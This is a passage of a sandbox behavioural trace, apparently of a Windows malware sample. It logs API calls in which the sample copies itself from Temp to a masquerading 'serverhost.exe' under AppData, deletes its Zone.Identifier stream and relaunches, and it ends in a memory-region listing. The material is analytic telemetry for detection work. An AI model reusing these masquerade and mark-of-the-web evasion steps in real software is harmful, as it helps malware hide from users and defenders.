VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.638] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.639] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.640] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.641] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.642] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.642] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.642] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.642] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.642] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.642] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.642] VirtualAlloc (lpAddress=0x0, dwSize=0x0, flAllocationType=0x0, flProtect=0x0) returned 0x0 [0050.690] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x71a10000 [0050.691] LoadLibraryA (lpLibFileName="urlmon.dll") returned 0x76f00000 [0050.691] LoadLibraryA (lpLibFileName="wininet.dll") returned 0x77040000 [0050.691] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x3b0000 [0050.692] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0050.692] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0050.692] FreeConsole () returned 0 [0050.692] VirtualProtect (in: lpAddress=0x3b1000, dwSize=0x885f, flNewProtect=0x20, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0050.692] VirtualProtect (in: lpAddress=0x3ba000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0050.692] VirtualProtect (in: lpAddress=0x3bb000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0050.692] VirtualProtect (in: lpAddress=0x3bc000, dwSize=0x4d8, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0050.692] VirtualProtect (in: lpAddress=0x3b0000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x12fc50 | out: lpflOldProtect=0x12fc50*=0x4) returned 1 [0052.403] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x12fc18, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe")) returned 0x2e [0052.403] _snwprintf (in: _Dest=0x12fe20, _Count=0x40, _Format="E%X" | out: _Dest="EACA73F0A") returned 9 [0052.403] _snwprintf (in: _Dest=0x12fea0, _Count=0x40, _Format="M%X" | out: _Dest="MACA73F0A") returned 9 [0052.403] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EACA73F0A") returned 0xc0 [0052.403] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MACA73F0A") returned 0xc4 [0052.403] GetLastError () returned 0xb7 [0052.403] SetEvent (hEvent=0xc0) returned 1 [0052.406] CloseHandle (hObject=0xc0) returned 1 [0052.406] CloseHandle (hObject=0xc4) returned 1 [0052.406] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x764f0000 [0052.406] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x77140000 [0052.406] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x758a0000 [0052.406] LoadLibraryW (lpLibFileName="crypt32.dll") returned 0x755b0000 [0052.407] LoadLibraryW (lpLibFileName="urlmon.dll") returned 0x76f00000 [0052.407] LoadLibraryW (lpLibFileName="userenv.dll") returned 0x74af0000 [0052.412] LoadLibraryW (lpLibFileName="wininet.dll") returned 0x77040000 [0052.412] LoadLibraryW (lpLibFileName="wtsapi32.dll") returned 0x74180000 [0052.414] GetWindowsDirectoryW (in: lpBuffer=0x12f9f8, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0052.414] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x3bb27c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x3bb27c*=0x78b95e2e, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0052.414] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3bb9c8, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe")) returned 0x2e [0052.414] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x6) returned 0x0 [0052.416] lstrlenA (lpString="agent,app,audio,bio,bits,cache,card,cart,cert,com,crypt,dcom,defrag,device,dhcp,dns,event,evt,flt,gdi,group,help,home,host,info,iso,launch,log,logon,lookup,man,math,mgmt,msi,ncb,net,nv,nvidia,proc,prop,prov,provider,reg,rpc,screen,search,sec,server,service,shed,shedule,spec,srv,storage,svc,sys,system,task,time,video,view,win,window,wlan,wmi") returned 342 [0052.416] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x3bb5b8 | out: pszPath="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local") returned 0x0 [0052.418] _snwprintf (in: _Dest=0x3bb5b8, _Count=0x104, _Format="%s\\Microsoft\\Windows" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows") returned 56 [0052.418] _snwprintf (in: _Dest=0x3bb7c0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned 71 [0052.418] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x104 [0052.418] CreateFileMappingW (hFile=0x104, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0052.419] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x3d0000 [0052.419] GetFileSize (in: hFile=0x104, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x19000 [0052.419] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0x3d0000, Length=0x19000) returned 0x67ecad1c [0052.419] UnmapViewOfFile (lpBaseAddress=0x3d0000) returned 1 [0052.420] CloseHandle (hObject=0x100) returned 1 [0052.420] CloseHandle (hObject=0x104) returned 1 [0052.420] GetComputerNameW (in: lpBuffer=0x12f9c8, nSize=0x12f9ec | out: lpBuffer="F71GWAT", nSize=0x12f9ec) returned 1 [0052.421] _snprintf (in: _Dest=0x3bb2a8, _Count=0x104, _Format="%S_%08X" | out: _Dest="F71GWAT_78B95E2E") returned 16 [0052.421] _snwprintf (in: _Dest=0x12f968, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\I78B95E2E") returned 16 [0052.421] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\I78B95E2E") returned 0x104 [0052.421] WaitForSingleObject (hHandle=0x104, dwMilliseconds=0x0) returned 0x0 [0052.421] _snwprintf (in: _Dest=0x12f868, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\E78B95E2E") returned 16 [0052.421] _snwprintf (in: _Dest=0x12f8e8, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\M78B95E2E") returned 16 [0052.421] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\M78B95E2E") returned 0x100 [0052.421] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\E78B95E2E") returned 0x108 [0052.421] SignalObjectAndWait (hObjectToSignal=0x108, hObjectToWaitOn=0x100, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0 [0052.421] ResetEvent (hEvent=0x108) returned 1 [0052.421] ReleaseMutex (hMutex=0x104) returned 1 [0052.421] CloseHandle (hObject=0x104) returned 1 [0052.421] GetTickCount () returned 0x14d16 [0052.421] CreateTimerQueueTimer (in: phNewTimer=0x12f9e8, TimerQueue=0x0, Callback=0x3b8310, Parameter=0x0, DueTime=0x3e8, Period=0x3e8, Flags=0x10 | out: phNewTimer=0x12f9e8*=0x1e2ff8) returned 1 [0052.421] WaitForSingleObject (hHandle=0x108, dwMilliseconds=0xffffffff) returned 0x0 [0054.521] DeleteTimerQueueTimer (TimerQueue=0x0, Timer=0x1e2ff8, CompletionEvent=0xffffffff) returned 1 [0054.521] CloseHandle (hObject=0x108) returned 1 [0054.522] CryptDestroyHash (hHash=0x0) returned 0 [0054.523] CryptDestroyKey (hKey=0x0) returned 0 [0054.523] CryptDestroyKey (hKey=0x0) returned 0 [0054.523] CryptReleaseContext (hProv=0x0, dwFlags=0x0) returned 0 [0054.523] ExitProcess (uExitCode=0x0) Thread: id = 31 os_tid = 0xaec Thread: id = 32 os_tid = 0xaf0 [0053.423] GetTickCount () returned 0x1510c Thread: id = 33 os_tid = 0xaf4 [0054.421] GetTickCount () returned 0x154f2 [0054.421] lstrcmpiW (lpString1="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", lpString2="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe") returned -1 [0054.421] GetFileAttributesW (lpFileName="C:\\" (normalized: "c:")) returned 0x10016 [0054.421] GetFileAttributesW (lpFileName="C:\\Users\\" (normalized: "c:\\users")) returned 0x11 [0054.421] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr")) returned 0x10 [0054.421] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata")) returned 0x2012 [0054.421] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local")) returned 0x2010 [0054.421] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft")) returned 0x2010 [0054.421] GetFileAttributesW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows")) returned 0x2010 [0054.421] SHFileOperationW (in: lpFileOp=0x189fd1c*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", pTo="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0) | out: lpFileOp=0x189fd1c*(hwnd=0x0, wFunc=0x1, pFrom="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe", pTo="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", fFlags=0xe14, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle=0x0)) returned 0 [0054.515] _snwprintf (in: _Dest=0x189f8ac, _Count=0x104, _Format="%s:Zone.Identifier" | out: _Dest="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe:Zone.Identifier") returned 87 [0054.515] DeleteFileW (lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe:Zone.Identifier" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe:zone.identifier")) returned 0 [0054.515] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x189fcd4*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x189fd28 | out: lpCommandLine=0x0, lpProcessInformation=0x189fd28*(hProcess=0x144, hThread=0x140, dwProcessId=0xaf8, dwThreadId=0xafc)) returned 1 [0054.517] CloseHandle (hObject=0x144) returned 1 [0054.517] CloseHandle (hObject=0x140) returned 1 [0054.517] SetEvent (hEvent=0x108) returned 1 Process: id = "5" image_name = "serverhost.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\serverhost.exe" page_root = "0x7eef7360" os_pid = "0xaf8" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xae4" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\serverhost.exe\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 883 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 884 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 885 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 886 start_va = 0x400000 end_va = 0x419fff entry_point = 0x401640 region_type = mapped_file name = "42753.exe" filename = "\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\42753.exe" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\42753.exe") Region: id = 887 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 888 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 889 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 890 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 891 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 892 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 893 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 894 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 895 start_va = 0x560000 end_va = 0x56ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 896 start_va = 0x5f9f0000 end_va = 0x5fb92fff entry_point = 0x5fa0e815 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 897 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 898 start_va = 0x70fc0000 end_va = 0x711fffff entry_point = 0x70fc66bd region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 899 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 900 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 901 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 902 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 903 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 904 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 905 start_va = 0x76670000 end_va = 0x766eafff entry_point = 0x76671aee region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\System32\\comdlg32.dll" (normalized: "c:\\windows\\system32\\comdlg32.dll") Region: id = 906 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 907 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 908 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 909 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 910 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 911 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 912 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 913 